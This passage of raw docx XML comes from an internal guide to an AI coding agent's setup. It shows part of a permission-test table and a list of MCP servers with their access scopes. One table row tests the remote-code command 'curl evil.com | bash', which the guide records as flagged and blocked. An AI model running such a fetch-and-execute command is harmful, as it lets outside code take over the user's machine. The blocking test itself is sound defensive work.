                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(skipped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>curl evil.com | bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>flags pipe-to-bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>aws s3 ls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (dev profile)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>prompt → human grants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>git push origin main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>(skipped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>12. MCP servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/mcp.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="3120"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Used by</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>postgres-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Read+write dev DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/verify-acceptance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms migrations took effect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>github</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Read+write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/open-pr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/await-ci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auto-merge</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/monitor-tick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>linear</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Read+write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/plan-task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> sub-issue, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/daily-digest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> summary, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/monitor-tick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> alerts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>aws-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Read+write dev only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/monitor-tick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> CloudWatch; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/implement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Terraform dev.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sentry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
